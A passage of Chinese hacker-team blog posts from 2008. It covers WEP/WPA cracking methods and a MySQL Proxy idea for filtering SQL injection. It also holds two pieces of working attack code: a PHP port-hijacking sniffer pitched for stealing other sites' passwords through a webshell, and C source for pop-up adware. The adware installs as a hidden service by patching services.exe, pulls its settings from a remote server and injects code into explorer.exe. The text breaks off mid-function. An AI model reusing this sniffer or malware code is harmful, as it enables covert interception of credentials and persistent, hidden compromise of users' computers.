上面都是安全策略方面的问题，现在略微说说攻击。攻击就拿WEP和WPA来举例，因为目前就这么几个常用的标准。WEP是最简单的安全措施，使用RC4算法对数据加密传输，密钥就是连接网络时候输入的口令。一个固定的字符串，同时做身份认证和加密密钥使用。显然安全性是非常差的，只要攻击者抓到一定数量的包，64位的WEP密钥，现在的普通PC大概5-10分钟就能计算出密钥，也就是网络密码来。而足够数量的WEP包，如果用户在上网下载或者看网页之类的，大概10分钟之内就能够抓到。也就是说64位密钥的WEP，在20分钟之内就能够被破解，而128位密钥的也只是稍微好一点。

就WPA而言，个人用户常用WPA-PSK认证，而企业则一般使用WPA-EAP认证。这是因为企业可以部署Radius服务器提供认证服务，所以可以使用EAP/802.1x认证协议。而个人用户就那么几台电脑，只能使用WPA-PSK（预共享密钥）进行认证了。WPA和WEP的区别在于，它认证口令和数据传输加密密钥是分开的，加密密钥在认证通过后协商生成，而且在传输一定的数据包后，会重新协商生成新的密钥。因此，抓取了再多的数据包，也是不能算出口令的，最多能够解出当前加密的密钥，得到明文数据传输。那么对WPA的口令破解只有一种方法，就是抓取到登陆时候的数据包。对于已经登陆的用户，可以通过发送特殊的错误数据包，让AP断开该用户的连接，要求用户重新登陆，这个时候攻击者抓取到完整的认证报之后，就可以进行破解工作了。这里的破解，也只不过是通过字典，或者暴力破解的方法来匹配抓取到的密码HASH，能否成功完全取决于密码的强度，也许只要1分钟，也许要1万年。

最后，不少人喜欢使用隐藏SSID的方法来保护无线网络安全，事实上这是很不可靠的，隐藏的SSID可以很容易的通过无线嗅探得到。

因此，WEP协议是肯定不安全的，容易破解。而WPA认证和加密都提供了足够的安全性，认证是否会被破解完全取决于密码本身的强度。宣称WPA被破解的文章，是不负责任的说法，因为相同意义上，除了一次性口令外的任何认证协议都可以使用同样的方法破解。

破解无线网络的工具，最有名的自然是BackTrack了，它是一个修改过的linux系统，一些攻击工具包的集合，攻击无线网络非常的方便，官方地址是：http://www.remote-exploit.org/backtrack.html。另外一套很全的工具包是aircrack系列，包括WEP，WPA-PSK数据包的捕获破解等多个小工具，地址为：http://www.aircrack-ng.org/。另有一个公司是http://www.wildpackets.com/，不过似乎没有免费的，都要银子。

甲方做了这么多年，攻击方面只能写到这种程度了，再详细就没意思了，而且我的兴趣也只在这个文章的前半部分。手把手的攻击，去搜索吧，大把的文章。

[Tips]利用php来嗅探劫持服务器数据

2008-06-10T01:07:00.000-07:00

by 云舒
2008-06-10
http://www.ph4nt0m.org

前几天刺在我们的maillist发了一个老外写的文章，大意是可以用php来实现数据的劫持和转发。我瞄了一下，确实可行，于是今天抽出了以前用来扯淡的时间，写了段代码验证了一下想法。老外的原文是一个PDF，有兴趣看的可以看看。地址是在：http://www.secforce.co.uk/media/presentations/OWASP_Abusing_PHP_sockets.pdf。其实关于这个的原理，我记得很早很早之前flashsky就在xfocus上面贴过通过SO_REUSEADDR实现端口重复绑定的，mix还写过一个 guest权限嗅探密码的。我这里比较不同的是用php实现的，可以在webshell里面用，当然我没有测试过，我没shell。

需要注意的是，这个东西和以前的《PHP下实现端口复用/劫持》是完全不一样的，那个文章可以在这里找到：http://www.west999.com/info/html/wangluobiancheng/Phpbiancheng/20080224/22439.html。至于为什么不一样，我就不说了。

代码我注释得很详细，个人觉得写得还不错，不细说。这里大概说一下技术上的难点。首先是在web里面，没有多线程也没有多进程，但是每一个新连接进来就要去处理，应该怎么做？显然不能顺序执行，因为光accept那里就会被阻塞住的，而且后面每一个session也需要分别处理的。还好查手册发现经典的socket_select函数可用，有这个就好说了，专业实现多路复用的。

PHP代码如下，有详细注释。blog贴的，所以代码可能会掉些东西，其他的支持我就不提供了，看代码：

<?php
class select
{
var $sockets;

// 构造函数
function select($sockets)
{
$this->sockets = array();

foreach($sockets as $socket)
{
$this->add($socket);
}
}

function add($add_socket)
{
//array_push($this->sockets, $add_socket);
$this->sockets[] = $add_socket;
}

// 利用临时数组来删除数组中的元素
function remove($remove_socket)
{
$tmp_sockets = array();

foreach($this->sockets as $socket)
{
if($remove_socket != $socket)
{
$tmp_sockets[] = $socket;
}
}

$this->sockets = $tmp_sockets;
}

// 检查socket数组是否可读，传入超时时间，返回socket数组
function can_read($timeout)
{
$read = $this->sockets;
socket_select( $read, $write = NULL, $except = NULL, $timeout );
return $read;
}

// 检查socket数组是否可写，传入超时时间，返回socket数组
function can_write($timeout)
{
$write = $this->sockets;
socket_select( $read = NULL, $write, $except = NULL, $timeout );
return $write;
}
}

// 网页不超时
set_time_limit(0);

// 即时输出数据，不缓冲
ob_end_clean();
ob_implicit_flush(true);

if( !isset($_GET["listen_ip"]) )
{
exit;
}
if( $_GET["listen_ip"] == "" )
{
exit;
}

$listen_ip = $_GET["listen_ip"];
$listen_port = 80;

// 建立socket
$listen_sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

// 设置重复绑定
socket_set_option($listen_sock, SOL_SOCKET, SO_REUSEADDR, 1);

// 明确指定绑定IP地址，优先获取数据
socket_bind($listen_sock, $listen_ip, $listen_port);

// 开始监听
socket_listen ($listen_sock);

echo "listen on ".htmlentities($listen_ip)." :".$listen_port." ";

// 创建socket数组，使用select来轮询
$check_socks = array($listen_sock);

// 映射客户端socket和服务端socket
// $socket_maps1将客户端socket作为key
// $socket_maps2将服务端socket作为key
// 以内存换速度，并且方便下面的搜索
$socket_maps1 = array( );
$socket_maps2 = array( );

// 实例化select类
$select = new select( $check_socks );

while(true)
{
/*
print_r( $socket_maps );
print " ";
*/
// select轮询，超时2秒
foreach ($select->can_read(1) as $socket)
{
// listen_sock可读，说明有人连接上来了
if( $socket == $listen_sock )
{
// 接受新连接，并加入到轮训数组
$new_client = socket_accept($listen_sock);
$select->add($new_client);

socket_getpeername($new_client, $ip, $port);
echo "New client connected: $ip, $port ";

// 建立到真实服务器的socket
$server_sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($server_sock,"127.0.0.1", $listen_port);

// 建立真实服务器socket和真实客户端socket之间的映射关系
$socket_maps1[$new_client] = $server_sock;
$socket_maps2[$server_sock] = $new_client;

// 添加到select轮询中
$select->add($server_sock);

// $listen_sock的可读数据是因为有新连接，已经处理了。暂时去掉，因为下面开始处理数据转发
//select->remove( $listen_sock );
}

// 其他socket可读，表示有数据需要中转
else
{
// 读取数据，失败则从轮询socket中删除，并关闭socket
$client_data = @socket_read($socket, 1024, PHP_NORMAL_READ);
if ($client_data === false)
{
socket_close( $socket );
$select->remove( $socket );
echo "client disconnected. ";

continue;
}

// 如果socket在$socket_maps1的key中，说明是从客户端读到了数据
if( in_array( $socket, array_keys($socket_maps1) ) )
{
//echo "readed from client. ";
if( ! socket_write( $socket_maps1[$socket], $client_data ) )
{
socket_close( $socket );
socket_close( $socket_maps1[$socket] );
$select->remove( $socket );
$select->remove( $socket_maps1[$socket] );
print "Write to server error. ";
}
print htmlentities($client_data)." ";
}
// 否则如果socket在$socket_maps2的key中，说明是从真正的web服务器读到了数据
elseif( in_array( $socket, array_keys($socket_maps2) ) )
{
//echo "readed from server. ";
if( ! socket_write( $socket_maps2[$socket], $client_data ) )
{
socket_close( $socket );
socket_close( $socket_maps2[$socket] );
$select->remove( $socket );
$select->remove( $socket_maps2[$socket] );
print "Write to client error. ";
}
print htmlentities($client_data)." ";
}
}
}
}

?>

这个东西有什么作用？自由发挥。也许你有一个webshell，但是却想知道同一个服务器上面别人网站的密码……我是在windows xp+apache测试的，据我所知windows2003默认已经不准重复绑定端口了。

[Tips]MySQL Proxy（解决注入的另一思路）

2008-06-04T20:21:00.000-07:00

by 云舒
2008-06-05
http://www.ph4nt0m.org

What is MySQL Proxy?

MySQL Proxy is a simple program that sits between your client and MySQL server(s) that can monitor, analyze or transform their communication. Its flexibility allows for unlimited uses; common ones include: load balancing; failover; query analysis; query filtering and modification; and many more.

可以看到，MySQL Proxy的主要作用是用来做负载均衡，数据库读写分离的。但是需要注意的是，MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏，据我所知网易也是——可以参见云风的博客。这样一种扩展，就给了我让他做别的事情的思路——防止注入攻击。

启动MySQL Proxy的时候，加载一个Lua脚本，对每一个进入的query或者insert之类的语句做一次安全检查，甚至替换查询中的某些内容，这样在程序员的程序中忘记了过滤参数的情况下，还有最后一道防线可用。而且由于是Lua这样的动态脚本语言，在开发，修正，部署方面都会有极大的灵活性。当然，或许会担心性能方面的问题，那么在前面加memcached吧，或者干脆用c来写这样的扩展，毕竟MySQL Proxy是开源的，而且有清晰的接口。

MySQL Proxy提供给Lua的接口主要有以下几个函数：

connect_server() — 这个函数每次client连接的时候被调用，可以用这个函数来处理负载均衡，决定当前的请求发给那个后台的服务器，如果没有指定这个函数，那么就会采用简单的轮询机制。

read_handshake() — 这个函数在server返回初始握手信息时被调用，可以调用这个函数在验证信息发给服务器前进行额外的检查。

read_auth() — client发送验证信息给服务器的时候会调用这个函数。

read_auth_result() — 服务器验证信息返回后调用这个函数。

read_query() — 每次client发送查询请求函数的时候被调用，可以用这个函数进行查询语句的预处理，过滤掉非预期的查询等等，这个是最常用的函数。

read_query_result() — 查询结果返回是调用的函数，可以进行结果集处理。

可以看到，自由发挥之后还是有很多其它的事情可以做的。不知道现在有没有公司这么做，或者说做过这方面的尝试。我只是写一个小思路，可行不可行，等以后再去检验吧。最近牙疼的厉害，唉，小时候不注意，现在治疗保护都来不及了。以后有了自己的宝宝，我会吸取教训的，呵呵，与君共勉。

参考资料：
http://www.maycode.com/index.php/hotspot/35-linux/740-mysql.html
http://forge.mysql.com/wiki/MySQL_Proxy

[Tips]Dedecms getip()的漏洞利用

2008-05-18T19:46:00.000-07:00

author: superhei
team:http://www.ph4nt0m.org
blog:http://superhei.blogbus.com
2008-05-16

flyh4t在非安全发布了dedecms getip()的注射漏洞，漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题，我想这个漏洞很多人都找到了，不过这个漏洞的利用有个地方还是可以说说的，可以直接得到shell：

在用户登陆后把用户信息写如了缓存：\include\inc_memberlogin.php

整个过程其实就是一个很完整的"二次攻击"，而str_replace("'","\\'",$v);起了关键性的作用 :)

[因为这个漏洞当我pc上有那么段时间了，这个文章很多都是凭记忆写的，可能有错误，有兴趣的同学可以自己跟一下。]

[Tips]一个弹窗口的流氓软件

2008-05-16T08:12:00.000-07:00

by 云舒
2008-05-16
http://www.ph4nt0m.org

这个东西的主要功能就是去网上一个URL读取配置文件，拿到需要弹出的窗口以及周期时间，然后开始弹……程序安装成服务，并设置为自动启动。启动之后写入一段代码到explorer.exe进程中，也就是这里在弹网页，然后将服务停止。

我写的代码没什么技术含量，唯一的是使用了我们team的zzzevazzz的隐藏服务代码，最开始他是发在ph4nt0m的核心区的。不过他已经在自己的blog写过，所以我发出来也没问题了。

这个是主函数，安装，读取配置，注入代码用的。

/**************************************************************************************************
* 1. 给XX作的流氓软件
* 2. 隐藏服务是copy的EVA的代码，修改Services.exe进程内存。
**************************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <Winsock2.h>
#include <windows.h>
#include <Tlhelp32.h>

// 是否记录日志
//#define DEBUG
#ifdef DEBUG
 #define DEBUG_LOG "c:\debug.txt"
 // 日志记录函数
 void LogToFile( WCHAR * );
#endif

#include "ControlService.h"
#include "HideService.h"
#include "CustomFunction.h"

#pragma comment (lib, "Advapi32.lib")
#pragma comment (lib, "Shell32.lib")
#pragma comment (lib, "ws2_32.lib")
#pragma comment (lib, "User32.lib")

#define REMOTE_FUNC_LENGTH 1024 * 10 // 拷贝的长度
#define TARGET_PROCESS L"explorer.exe" // 要注入代码的目标进程
#define CONFIG_HOST "www.icylife.net" // 读取配置信息的服务器
#define CONFIG_PATH "/url.txt" // 配置信息在配置服务器的路径
#define IE_PATH "C:\Program Files\Internet Explorer\iexplore.exe"
#define DEFAULT_URL "http://www.he100.com" // 默认弹出的窗口
#define DEFAULT_SLEEP_TIME 30 * 60 * 1000 // 默认弹出窗口的间隔时间

// 宏，转换字符串为unicode
#define MULTI_TO_WIDE( x, y ) MultiByteToWideChar( CP_ACP, MB_PRECOMPOSED,y,-1,x,_MAX_PATH );

// 弹出窗口之间的间隔时间
int sleep_time;

// 弹出的url地址
char url_path[512] = { 0 };

/**************************************************************************************************
* 函数原形
**************************************************************************************************/

void ServiceMain( DWORD, char **); //服务入口
BOOL SetDebugPrivilege( ); //获取debug权限
DWORD GetProcessIdByName(WCHAR * ); //获取进程的PID
void InjectCode( ); //写代码到远程进程
void GetConfig( ); //更新配置，获取要弹出的地址和弹出间隔时间

/**************************************************************************************************
* 程序入口，主函数
**************************************************************************************************/
int WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{
 WCHAR filePath[MAX_PATH] = { 0 }; //程序本身路径
 SERVICE_TABLE_ENTRY serviceTable[2];

 serviceTable[0].lpServiceName = SERVICE_NAME;
 serviceTable[0].lpServiceProc = ( LPSERVICE_MAIN_FUNCTION )ServiceMain;

 serviceTable[1].lpServiceName = NULL;
 serviceTable[1].lpServiceProc = NULL;

 GetModuleFileName( NULL, filePath, MAX_PATH );

 // 如果服务未安装，安装
 if( !ServiceExists( filePath ) )
 {
 if( ServiceInstall( filePath ) != TRUE )
 {
 return -1;
 }
 else
 {
 return 0;
 }
 }

 if( !StartServiceCtrlDispatcher( serviceTable ) )
 {
 #ifdef DEBUG
 WCHAR tmp[256] = { 0 };
 wsprintf( tmp, L"Main StartServiceCtrlDispatcher error: %d\n", GetLastError() );
 LogToFile( tmp );
 #endif

 return -1;
 }

 return 0;
}

/**************************************************************************************************
* 服务入口
**************************************************************************************************/
void ServiceMain( DWORD argc, char *argv[] )
{
 serviceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
 serviceStatus.dwCurrentState = SERVICE_START_PENDING;
 serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
 serviceStatus.dwWin32ExitCode = 0;
 serviceStatus.dwServiceSpecificExitCode = 0;
 serviceStatus.dwCheckPoint = 0;
 serviceStatus.dwWaitHint = 0;

 #ifdef DEBUG
 LogToFile( L"ServiceMain: Try to register service\n" );
 #endif

 hServiceStatus = RegisterServiceCtrlHandler( SERVICE_NAME, (LPHANDLER_FUNCTION)ServiceControl );
 if( hServiceStatus == (SERVICE_STATUS_HANDLE)0 )
 {
 #ifdef DEBUG
 WCHAR tmp[256] = { 0 };
 wsprintf( tmp, L"ServiceMain: Register service error: %d\n", GetLastError() );
 LogToFile( tmp );
 #endif

 return;
 }

 serviceStatus.dwCurrentState = SERVICE_RUNNING;
 serviceStatus.dwCheckPoint = 0;
 serviceStatus.dwWaitHint = 0;

 if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
 {
 #ifdef DEBUG
 WCHAR tmp[256] = { 0 };
 swprintf( tmp, L"ServiceMain: Start service error: %d\n", GetLastError() );
 LogToFile( tmp );
 #endif

 return;
 }

 #ifdef DEBUG
 LogToFile( L"ServiceMain: Start service ok\n" );
 #endif

 // 隐藏服务
 HideService( SERVICE_NAME );

 // 从网络读取配置
 GetConfig( );

 // 注入代码
 InjectCode( );

 serviceStatus.dwCurrentState = SERVICE_STOPPED;
 if( !SetServiceStatus( hServiceStatus, &serviceStatus) )
 {
 #ifdef DEBUG
 WCHAR tmp[256] = { 0 };
 wsprintf( tmp, L"ServiceMain: Stop service error: %d\n", GetLastError() );
 LogToFile( tmp );
 #endif
 }

 #ifdef DEBUG
 LogToFile( L"Stop service in main.\n" );
 #endif

 #ifdef DEBUG
 LogToFile( L"ServiceMain Done.\n" );
 #endif

 return;
}

void InjectCode( )
{
 if( ! SetDebugPrivilege() )
 {
 #ifdef DEBUG
 LogToFile( L"Set Debug Privileges error.\n" );
 #endif

 return;
 }

 DWORD dwPID = -1;
 while( 1 )
 {
 dwPID = GetProcessIdByName( TARGET_PROCESS );

 if( -1 != dwPID )
 {
 #ifdef DEBUG
 WCHAR tmp[256] = { 0 };
 wsprintf( tmp, L"Target process id is %d\n", dwPID );
 LogToFile( tmp );
 #endif

 break;
 }

 #ifdef DEBUG
 LogToFile( L"Target process not found, sleep and continue.\n" );
 #endif

 Sleep( 30 * 1000 );
 }

 Sleep( 2 * 60 * 1000 );

 // 打开进程
 HANDLE hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwPID );
 if( ! hProcess )
 {
 #ifdef DEBUG
 LogToFile( L"OpenProcess error.\n" );
 #endif

 return;
 }

 //计算LoadLibraryA和GetProcAddress的入口地址，这两个函数由kernel32.dll导出，在各进程中不变
 Arguments arguments;

 memset( (void *)&arguments, 0, sizeof(Arguments) );
 HMODULE hKernel = GetModuleHandleA( "kernel32" );
 if( hKernel == NULL )
 {
 #ifdef DEBUG
 LogToFile( L"GetModuleHandle kernel32.dll error.\n" );
 #endif

 return;
 }
 arguments.MyLoadLibrary = GetProcAddress( hKernel, "LoadLibraryA" );
 arguments.MyGetAddress = GetProcAddress( hKernel, "GetProcAddress" );

 strcpy( arguments.MyKernelDll, "kernel32.dll" );
 strcpy( arguments.MyProgram, IE_PATH );
 strcpy( arguments.MyShellDll, "Shell32.dll" );
 strcpy( arguments.MyShellExecute, "ShellExecuteA" );
 strcpy( arguments.MyUrl, url_path );
 strcpy( arguments.MyZeroMemory, "RtlZeroMemory" );
 arguments.SleepTime = sleep_time;

 // 在远程进程中分配内存存放参数，可写权限
 Arguments *remote_agrument = (Arguments *)VirtualAllocEx( hProcess,
 0,
 sizeof(Arguments),
 MEM_COMMIT,
 PAGE_READWRITE );
 if( !remote_agrument )
 {
 #ifdef DEBUG
 LogToFile( L"VirtualAllocEx for arguments error.\n" );
 #endif

 return;
 }

 #ifdef DEBUG
 WCHAR tmp[256] = { 0 };
 wsprintf( tmp, L"Remote Arguments' addr: 0x%08x\n", (DWORD)remote_agrument );
 LogToFile( tmp );
 #endif

 // 将参数写入远程进程内存
 int bytes_write;
 if( !WriteProcessMemory( hProcess, (LPVOID)remote_agrument, (LPVOID)&arguments, sizeof(Arguments), (SIZE_T *)&bytes_write) )
 {
 #ifdef DEBUG
 LogToFile( L"WriteProcessMemory for arguments error.\n" );
 #endif
 return;
 }

 // 在远程进程中分配内存存放代码，可执行权限
 LPVOID remote_func = VirtualAllocEx( hProcess,
 0,
 REMOTE_FUNC_LENGTH,
 MEM_COMMIT,
 PAGE_EXECUTE_READWRITE );
 if( !remote_func )
 {
 #ifdef DEBUG
 LogToFile( L"VirtualAllocEx for function error.\n" );
 #endif

 return;
 }

 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );
 wsprintf( tmp, L"Remote Function Address: 0x%08x\n", remote_func );
 LogToFile( tmp );
 #endif

 // 将代码写入远程进程内存
 if( !WriteProcessMemory( hProcess, (LPVOID)remote_func, (LPVOID)&CustomFunction, REMOTE_FUNC_LENGTH, (SIZE_T *)&bytes_write) )
 {
 #ifdef DEBUG
 LogToFile( L"WriteProcessMemory for function error.\n" );
 #endif

 return;
 }

 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );
 wsprintf( tmp, L"WriteProcessMemory for function %d bytes\n", bytes_write );
 LogToFile( tmp );
 #endif

 HANDLE remote_thread = CreateRemoteThread( hProcess, 0, 0, (LPTHREAD_START_ROUTINE)remote_func, remote_agrument, 0, 0 );
 if ( !remote_thread )
 {
 #ifdef DEBUG
 LogToFile( L"CreateRemoteThread for function error.\n" );
 #endif

 return;
 }

 #ifdef DEBUG
 LogToFile( L"CreateRemoteThread for function ok\n" );
 #endif

 /*
 WaitForSingleObject( remote_thread, INFINITE );

 if( NULL != remote_func )
 {
 VirtualFreeEx( hProcess, remote_func, REMOTE_FUNC_LENGTH, MEM_RELEASE );
 #ifdef DEBUG
 LogToFile( L"VirtualFreeEx for remote_func.\n" );
 #endif
 }
 if( NULL != remote_agrument )
 {
 VirtualFreeEx( hProcess, remote_agrument, sizeof (Arguments), MEM_RELEASE);

 #ifdef DEBUG
 LogToFile( L"VirtualFreeEx for remote_agrument.\n" );
 #endif
 }

 if( NULL != remote_thread )
 {
 CloseHandle( remote_thread );

 #ifdef DEBUG
 LogToFile( L"CloseHandle for remote_thread.\n" );
 #endif
 }
 if( NULL != hProcess )
 {
 CloseHandle( hProcess );

 #ifdef DEBUG
 LogToFile( L"CloseHandle for hProcess.\n" );
 #endif
 }
 */

 return;
}

void GetConfig( )
{
 #ifdef DEBUG
 WCHAR tmp[256] = { 0 };
 #endif

 WSAData wsa;
 struct sockaddr_in sin;

 memset( &sin, 0, sizeof(struct sockaddr_in) );
 if( WSAStartup( 0x0202, &wsa ) != 0 )
 {
 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );
 wsprintf( tmp, L"WSAStartup error: %d\n", GetLastError() );
 LogToFile( tmp );
 #endif

 goto getconfig_error;
 }

 struct hostent *phost = gethostbyname( CONFIG_HOST );
 if( phost == NULL )
 {
 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );
 wsprintf( tmp, L"Resolv config host name error: %d\n", GetLastError() );
 LogToFile( tmp );
 #endif

 WSACleanup( );
 goto getconfig_error;
 }

 memcpy( &sin.sin_addr , phost->h_addr_list[0] , phost->h_length );
 sin.sin_family = AF_INET;
 sin.sin_port = htons( 80 );

 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );

 WCHAR ip[256] = { 0 };
 MULTI_TO_WIDE( ip, inet_ntoa( sin.sin_addr ));

 wsprintf( tmp, L"Resolv config host name ok: %s\n",ip );
 LogToFile( tmp );
 #endif

 SOCKET sock = socket( AF_INET , SOCK_STREAM , 0 );
 if( sock == INVALID_SOCKET )
 {
 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );
 wsprintf( tmp, L"Connect to %s:%s error: \n", ip, 80, GetLastError() );
 LogToFile( tmp );
 #endif

 WSACleanup( );
 goto getconfig_error;
 }

 int ret = connect( sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in) );
 if( SOCKET_ERROR == ret )
 {
 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );
 wsprintf( tmp, L"Connect error: %d\n", GetLastError() );
 LogToFile( tmp );
 #endif

 closesocket( sock );
 WSACleanup( );
 goto getconfig_error;
 }

 char send_buff[512] = { 0 };
 sprintf( send_buff, "GET %s HTTP/1.1\r\nHost: %s\r\nAccept: */*\r\n\r\n", CONFIG_PATH, CONFIG_HOST );

 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );

 WCHAR tmp2[256] = { 0 };
 MULTI_TO_WIDE( tmp2, send_buff );
 wsprintf( tmp, L"Send request to get config:\n %s\n", tmp2 );
 LogToFile( tmp );

 #endif

 ret = send( sock, send_buff, strlen(send_buff), 0 );
 if( SOCKET_ERROR == ret )
 {
 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );
 wsprintf( tmp, L"Send request error: %d\n", GetLastError() );
 LogToFile( tmp );
 #endif

 closesocket( sock );
 WSACleanup( );
 goto getconfig_error;
 }

 #ifdef DEBUG
 LogToFile( L"Send request ok!\n" );
 #endif

 char recv_buff[1024] = { 0 };
 recv( sock, recv_buff, 1000, 0 );
 if( !recv_buff )
 {
 closesocket( sock );
 WSACleanup( );
 goto getconfig_error;
 }

 closesocket( sock );
 WSACleanup( );

 char *content = strstr( recv_buff, "\r\n\r\n" );
 if( !content )
 {
 goto getconfig_error;
 }

 content += strlen("\r\n\r\n");

 #ifdef DEBUG
 memset( tmp, 0, sizeof(tmp) );

 WCHAR c[256] = { 0 };
 MULTI_TO_WIDE( c, content );

 wsprintf( tmp, L"Config content is:\n%s\n", c );
 LogToFile( tmp );
 #endif

 char *split_flag = strstr( content, "|" );
 if( !split_flag )
 {
 goto getconfig_error;
 }

 char tmp_time[32] = { 0 };
 char tmp_url[512] = { 0 };
 if( split_flag - content > 32 )
 {
 sleep_time = DEFAULT_SLEEP_TIME;
 }
 else
 {
 strncpy( tmp_time, content, split_flag - content );
 sleep_time = atoi( tmp_time );
 }

 if( strlen( split_flag ) >= 512 )
 {
 strcpy( url_path, DEFAULT_URL );
 }
 else
 {
 strcpy( url_path, split_flag + 1 );
 }

 return;

 getconfig_error:

 sleep_time = DEFAULT_SLEEP_TIME;
 strcpy( url_path, DEFAULT_URL );

 return;
}

/**************************************************************************************************
* 记录日志函数
**************************************************************************************************/

#ifdef DEBUG
void LogToFile( WCHAR *str )
{
 FILE *fp;

 fp = fopen( DEBUG_LOG, "a" );
 fwprintf( fp, L"%s\n", str );
 fclose( fp );
}
#endif

这个是隐藏服务用的，修改了services.exe文件，可能有一定的危险性。

// yunshu(pst) Copy from zzzevazzz(pst)'s code
// 几个Undocument的结构
typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;
typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;
typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

typedef struct _SC_SERVICE_PROCESS
{
 PSC_SERVICE_PROCESS Previous;
 PSC_SERVICE_PROCESS Next;
 WCHAR *ImagePath;
 DWORD Pid;
 DWORD NumberOfServices;
 //
} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE
{
 PSC_DEPEND_SERVICE Next;
 DWORD Unknow;
 PSC_SERVICE_RECORD Service;
 //
} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD
{
 PSC_SERVICE_RECORD Previous;
 PSC_SERVICE_RECORD Next;
 WCHAR *ServiceName;
 WCHAR *DisplayName;
 DWORD Index;
 DWORD Unknow0;
 DWORD sErv;
 DWORD ControlCount;
 DWORD Unknow1;
 PSC_SERVICE_PROCESS Process;
 SERVICE_STATUS Status;
 DWORD StartType;
 DWORD ErrorControl;
 DWORD TagId;
 PSC_DEPEND_SERVICE DependOn;
 PSC_DEPEND_SERVICE Depended;
 //
} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

BOOL SetDebugPrivilege()
{
 BOOL bRet = FALSE;
 HANDLE hToken = NULL;
 LUID luid;
 TOKEN_PRIVILEGES tp;

 if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&
 LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
 {
 tp.PrivilegeCount = 1;
 tp.Privileges[0].Luid = luid;
 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
 }

 if (hToken) CloseHandle(hToken);
 return bRet;
}

DWORD GetProcessIdByName(WCHAR *Name)
{
 BOOL bRet = FALSE;
 HANDLE hProcessSnap = NULL;
 PROCESSENTRY32 pe32 = { 0 };
 DWORD Pid = -1;

 hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if (INVALID_HANDLE_VALUE == hProcessSnap) return -1;

 pe32.dwSize = sizeof(PROCESSENTRY32);

 if (Process32First(hProcessSnap, &pe32))
 {
 do
 {
 if ( !_wcsicmp(pe32.szExeFile, Name ) )
 {
 Pid = pe32.th32ProcessID;
 break;
 }
 }
 while (Process32Next(hProcessSnap, &pe32));
 }

 CloseHandle(hProcessSnap);
 return Pid;
}

// 修改内存属性为指定值
void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)
{
 MEMORY_BASIC_INFORMATION mbi;
 DWORD dwOldProtect, dwWritten;

 VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));
 VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);
 WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);
 VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
}

//寻找服务链表
PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)
{
 WCHAR FileName[MAX_PATH+1];
 HANDLE hFile, hFileMap;
 UCHAR * pMap;
 DWORD dwSize, dwSizeHigh, i, dwRead;
 SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;

 GetSystemDirectory( FileName, MAX_PATH );
 wcscat( FileName, L"\Services.exe");

 hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,
 NULL, OPEN_EXISTING, 0, NULL);
 if (INVALID_HANDLE_VALUE == hFile) return NULL;

 dwSizeHigh = 0;
 dwSize = GetFileSize(hFile, &dwSizeHigh);

 hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
 if (NULL == hFileMap) return NULL;

 pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);
 if (NULL == pMap) return NULL;

 dwSize -= 12;
 for (i=0; i<dwSize; ++i)
 {
 // 搜索services!ScGetServiceDatabase特征代码
 if (*(DWORD*)(pMap+i) == 0xa1909090 &&
 *(DWORD*)(pMap+i+8) == 0x909090c3)
 {
 #ifdef DEBUG
 WCHAR tmpBuffer[256] = { 0 };
 wsprintf( tmpBuffer, L"map is 0x%08x\n", (DWORD *)(pMap+i) );
 LogToFile( tmpBuffer );
 #endif

 if (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&
 ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
 SvcRd.sErv == 'vrEs') // ServiceRecord结构的特征
 {
 pRet = pSvcRd;

 #ifdef DEBUG
 WCHAR tmpBuffer[256] = { 0 };
